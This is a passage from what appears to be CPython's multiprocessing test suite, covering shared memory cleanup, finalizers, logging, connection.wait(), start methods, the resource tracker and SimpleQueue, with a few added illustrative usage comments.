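#   sl.shm.close()
#   sl.shm.unlink()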
def test_shared_memory_ShareableList_pickling(self):
sl = shared_memory.ShareableList(range(10))
self.addCleanup(sl.shm.unlink)
serialized_sl = pickle.dumps(sl)
deserialized_sl = pickle.loads(serialized_sl)
self.assertTrue(
isinstance(deserialized_sl, shared_memory.ShareableList)
)
self.assertEqual(deserialized_sl[-1], 9)
self.assertFalse(sl is deserialized_sl)
deserialized_sl[4] = "changed"
self.assertEqual(sl[4], "changed")
# Verify data is not being put into the pickled representation.
name = 'a' * len(sl.shm.name)
larger_sl = shared_memory.ShareableList(range(400))
self.addCleanup(larger_sl.shm.unlink)
serialized_larger_sl = pickle.dumps(larger_sl)
self.assertEqual(len(serialized_sl), len(serialized_larger_sl))
larger_sl.shm.close()
deserialized_sl.shm.close()
sl.shm.close()
def test_shared_memory_cleaned_after_process_termination(self):
cmd = '''if 1:
import os, time, sys
from multiprocessing import shared_memory
# Create a shared_memory segment, and send the segment name
sm = shared_memory.SharedMemory(create=True, size=10)
sys.stdout.write(sm.name + '\\n')
sys.stdout.flush()
time.sleep(100)
'''
with subprocess.Popen([sys.executable, '-E', '-c', cmd],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as p:
name = p.stdout.readline().strip().decode()
# abruptly killing a process holding a reference to a shared memory
# segment should not leak that segment.
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
t = 0.1
while time.monotonic() < deadline:
time.sleep(t)
t = min(t*2, 5)
try:
smm = shared_memory.SharedMemory(name, create=False)
except FileNotFoundError:
break
else:
raise AssertionError("A SharedMemory segment was leaked after"
" a process was abruptly terminated.")
if os.name == 'posix':
# Without this line it was raising warnings like:
# UserWarning: resource_tracker:
# There appear to be 1 leaked shared_memory
# objects to clean up at shutdown
# See: https://bugs.python.org/issue45209
resource_tracker.unregister(f"/{name}", "shared_memory")
# A warning was emitted by the subprocess' own
# resource_tracker (on Windows, shared memory segments
# are released automatically by the OS).
err = p.stderr.read().decode()
self.assertIn(
"resource_tracker: There appear to be 1 leaked "
"shared_memory objects to clean up at shutdown", err)
#
#
#
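# Illustrative note (not part of the test suite): util.Finalize is an internal
# helper that registers a callback to run when its first argument is garbage
# collected or when multiprocessing's _exit_function() runs; callbacks with a
# higher exitpriority run first.  A minimal sketch (names are examples only):
#
#   from multiprocessing import util
#
#   class Resource:
#       pass
#
#   r = Resource()
#   util.Finalize(r, print, args=('releasing resource',), exitpriority=10)
#   del r      # on CPython the callback fires here, once r is collected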
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
gc.collect() # For PyPy or other GCs.
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
gc.collect() # For PyPy or other GCs.
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
gc.collect() # For PyPy or other GCs.
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with test.support.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
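# Illustrative sketch (not part of the test suite): multiprocessing keeps a
# module-level logger; log_to_stderr() attaches a stderr handler so library
# messages become visible:
#
#   import logging, multiprocessing
#
#   logger = multiprocessing.log_to_stderr()
#   logger.setLevel(logging.INFO)
#   logger.info('visible on stderr')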
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
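# Illustrative sketch (not part of the test suite): both SyncManager.start()
# and Pool() accept an (initializer, initargs) pair that is called once in
# each freshly started process, as the tests below verify (helper name is an
# example only):
#
#   def init_worker(value):
#       print('worker starting with', value)
#
#   pool = multiprocessing.Pool(2, initializer=init_worker, initargs=(42,))
#   pool.close()
#   pool.join()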
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
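# Illustrative sketch (not part of the test suite): connection.wait() blocks
# until at least one of the given Connection objects, sockets or process
# sentinels is ready, much like select():
#
#   from multiprocessing.connection import wait
#
#   a, b = multiprocessing.Pipe()
#   b.send('ready')
#   for conn in wait([a], timeout=5):    # -> [a]
#       print(conn.recv())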
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after-fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
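# Illustrative sketch (not part of the test suite): get_context() returns an
# object with the same API as the multiprocessing module but bound to a single
# start method, which is the preferred way to mix start methods in one program
# (helper name is an example only; use the usual __main__ guard with 'spawn'):
#
#   def worker(q):
#       q.put('spawned')
#
#   ctx = multiprocessing.get_context('spawn')
#   q = ctx.Queue()
#   p = ctx.Process(target=worker, args=(q,))
#   p.start()
#   print(q.get())
#   p.join()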
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
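# Illustrative sketch (not part of the test suite): SimpleQueue is a minimal
# pipe-based FIFO offering just put()/get()/empty()/close():
#
#   q = multiprocessing.SimpleQueue()
#   q.put('item')
#   assert not q.empty()
#   assert q.get() == 'item'
#   q.close()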
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
